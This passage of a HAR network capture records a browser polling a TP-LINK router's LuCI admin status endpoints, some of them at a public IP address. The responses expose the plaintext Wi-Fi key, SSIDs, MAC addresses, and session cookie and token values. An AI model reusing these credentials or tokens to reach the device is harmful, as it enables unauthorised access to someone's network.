reless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0.07,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4758\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 282,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 681,\r\n \"receive\": 24\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:09:59.659+03:00\",\r\n \"time\": 1832,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 275,\r\n \"dns\": 250,\r\n \"connect\": 526,\r\n \"send\": 0,\r\n \"wait\": 773,\r\n \"receive\": 8\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:09.643+03:00\",\r\n \"time\": 978,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4758,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0.08,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guet_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4758\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 268,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 674,\r\n \"receive\": 36\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:09.647+03:00\",\r\n \"time\": 1794,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://187.60.220.34:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"187.60.220.34:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 265,\r\n \"dns\": 251,\r\n \"connect\": 520,\r\n \"send\": 0,\r\n \"wait\": 754,\r\n \"receive\": 4\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:19.647+03:00\",\r\n \"time\": 994,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://187.60.220.34:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"187.60.220.34:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": 